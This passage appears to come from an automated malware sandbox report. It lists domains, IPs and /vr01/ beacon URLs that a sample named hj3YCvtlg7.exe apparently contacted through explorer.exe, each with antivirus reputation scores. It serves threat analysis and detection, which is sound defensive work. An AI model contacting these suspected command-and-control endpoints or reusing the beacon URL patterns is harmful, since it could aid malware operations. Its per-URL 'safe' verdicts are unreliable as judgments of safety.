http://www.bombslot-42.co/vr01/www.erabits.com	0%	Avira URL Cloud	safe
http://www.jupitr-claim.top	1%	Virustotal		Browse
http://www.molobeverello.com	0%	Avira URL Cloud	safe
http://www.mingshengglass.comReferer:	0%	Avira URL Cloud	safe
http://www.owletbaby.shopReferer:	0%	Avira URL Cloud	safe
http://www.jupitr-claim.topReferer:	0%	Avira URL Cloud	safe
http://www.oregonjobs.co	0%	Virustotal		Browse
http://www.kidscircle.shop/vr01/	0%	Avira URL Cloud	safe
http://www.ethicai.pro	0%	Avira URL Cloud	safe
http://www.mingshengglass.com/vr01/www.yoursweets.online	0%	Avira URL Cloud	safe
http://www.nicolbauer.com/vr01/	0%	Avira URL Cloud	safe
http://www.yesxoit.xyz	0%	Avira URL Cloud	safe
http://www.jupitr-claim.top/vr01/	100%	Avira URL Cloud	malware
http://www.mingshengglass.com/vr01/	0%	Avira URL Cloud	safe
http://www.yoursweets.online/vr01/www.ethicai.pro	100%	Avira URL Cloud	malware
http://www.erabits.com	0%	Avira URL Cloud	safe
http://www.owletbaby.shop/vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL	0%	Avira URL Cloud	safe
http://www.oregonjobs.co/vr01/www.helyibudapest.com	0%	Avira URL Cloud	safe
http://www.poseidoncrm.com	0%	Avira URL Cloud	safe
http://www.nicolbauer.com	0%	Avira URL Cloud	safe
http://www.poseidoncrm.com/vr01/www.yesxoit.xyz	0%	Avira URL Cloud	safe
http://www.yoursweets.online/vr01/	100%	Avira URL Cloud	malware
http://www.mayorii.com	0%	Avira URL Cloud	safe
http://www.erabits.comReferer:	0%	Avira URL Cloud	safe
http://www.molobeverello.comReferer:	0%	Avira URL Cloud	safe
http://www.molobeverello.com/vr01/	0%	Avira URL Cloud	safe
http://www.elcaporalburley.com	0%	Avira URL Cloud	safe
http://www.bombslot-42.co/vr01/	0%	Avira URL Cloud	safe
http://www.kidscircle.shop	0%	Avira URL Cloud	safe
http://www.helyibudapest.com	0%	Avira URL Cloud	safe
http://www.bombslot-42.coReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.owletbaby.shop	13.248.169.48	true	true	0%, Virustotal, Browse	unknown
www.helyibudapest.com	172.67.154.171	true	true	0%, Virustotal, Browse	unknown
www.mingshengglass.com	102.134.40.151	true	true	0%, Virustotal, Browse	unknown
oregonjobs.co	66.147.240.91	true	true	1%, Virustotal, Browse	unknown
ethicai.pro	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.bombslot-42.co	104.21.56.10	true	true	0%, Virustotal, Browse	unknown
www.kidscircle.shop	13.248.169.48	true	true	0%, Virustotal, Browse	unknown
www.erabits.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.ethicai.pro	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.poseidoncrm.com	unknown	unknown	true		unknown
www.oregonjobs.co	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.yoursweets.online	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.mayorii.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.mingshengglass.com/vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP	true	Avira URL Cloud: safe	unknown
http://www.bombslot-42.co/vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP	true	Avira URL Cloud: safe	unknown
www.yoursweets.online/vr01/	true	2%, Virustotal, Browse Avira URL Cloud: malware	low
http://www.owletbaby.shop/vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.oregonjobs.co/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/bat	explorer.exe, 00000006.00000003.2299319275.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.000000000899E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mayorii.com/vr01/www.oregonjobs.co	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoursweets.online	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.stacker.com/arizona/phoenix	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/DataSet1.xsd	hj3YCvtlg7.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1356648660.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3083184749.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(	explorer.exe, 00000006.00000002.3842240210.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2299846067.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1362710142.000000000BD22000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.poseidoncrm.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.owletbaby.shop/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.helyibudapest.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.helyibudapest.com/vr01/www.poseidoncrm.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSp	explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/rT	explorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.elcaporalburley.com/vr01/www.molobeverello.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elcaporalburley.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oregonjobs.coReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.erabits.com/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.erabits.com/vr01/www.mingshengglass.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kidscircle.shopReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.yesxoit.xyz/vr01/www.elcaporalburley.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ethicai.pro/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bombslot-42.co	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.yesxoit.xyzReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSJM	explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.oregonjobs.co	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.owletbaby.shop	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.jupitr-claim.top/vr01/www.nicolbauer.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.jupitr-claim.top	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.nicolbauer.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSZM	explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mayorii.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ethicai.pro/vr01/www.owletbaby.shop	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bombslot-42.co/vr01/www.erabits.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.molobeverello.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yelp.com	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mingshengglass.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.owletbaby.shopReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.jupitr-claim.topReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kidscircle.shop/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ethicai.pro	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?z$	explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mingshengglass.com/vr01/www.yoursweets.online	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nicolbauer.com/vr01/	explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yesxoit.xyz	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
